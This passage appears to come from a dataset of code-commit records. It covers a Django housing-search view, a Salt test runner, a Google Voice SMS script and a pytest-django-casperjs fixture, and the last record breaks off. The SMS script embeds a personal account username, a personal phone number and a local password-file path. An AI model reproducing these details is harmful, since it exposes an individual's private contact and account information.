context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
<commit_msg>Add zipcode filter for MFPs.<commit_after> | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
Add zipcode filter for MFPs.from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| <commit_before>from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
<commit_msg>Add zipcode filter for MFPs.<commit_after>from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
|
fdd75e81f6d71a8f82abdd79cff6ecd20cbfdb6d | tests/runtests.py | tests/runtests.py | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| Add some pretty to the unit tests | Add some pretty to the unit tests
| Python | apache-2.0 | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
Add some pretty to the unit tests | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| <commit_before>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
<commit_msg>Add some pretty to the unit tests<commit_after> | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
Add some pretty to the unit tests#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| <commit_before>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
<commit_msg>Add some pretty to the unit tests<commit_after>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
|
dd877d22080d8417709fe4b5afacec8f0b32a226 | sendsms.py | sendsms.py | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| Include exception when trying send_sms function. | Include exception when trying send_sms function.
| Python | mpl-2.0 | nicorellius/server-upbot | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
Include exception when trying send_sms function. | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| <commit_before>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
<commit_msg>Include exception when trying send_sms function.<commit_after> | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
Include exception when trying send_sms function.#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| <commit_before>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
<commit_msg>Include exception when trying send_sms function.<commit_after>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
|
621c69b22c6364020cf1ed66e4563bd7b43263fc | src/pytest_django_casperjs/fixtures.py | src/pytest_django_casperjs/fixtures.py | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
| import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| Remove the helper-fixture, we make transactions explicit. Will write documentation about that | Remove the helper-fixture, we make transactions explicit. Will write documentation about that
| Python | bsd-3-clause | EnTeQuAk/pytest-django-casperjs | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
Remove the helper-fixture, we make transactions explicit. Will write documentation about that | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| <commit_before>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
<commit_msg>Remove the helper-fixture, we make transactions explicit. Will write documentation about that<commit_after> | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
Remove the helper-fixture, we make transactions explicit. Will write documentation about thatimport os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| <commit_before>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
    """Session-scoped live server for CasperJS-driven tests.

    Address resolution order: ``--liveserver`` option, then the
    ``DJANGO_TEST_LIVE_SERVER_ADDRESS`` environment variable, then a
    built-in default. The server is stopped when the session ends.
    """
    skip_if_no_django()
    # Imported lazily so merely collecting tests does not require the helper.
    from pytest_django_casperjs.helper import CasperJSLiveServer
    addr = request.config.getvalue('liveserver')
    if not addr:
        addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
    if not addr:
        # Fallback: port 8081, or any free port in 8100-8200.
        addr = 'localhost:8081,8100-8200'
    server = CasperJSLiveServer(addr)
    # Guarantee shutdown even if dependent fixtures fail.
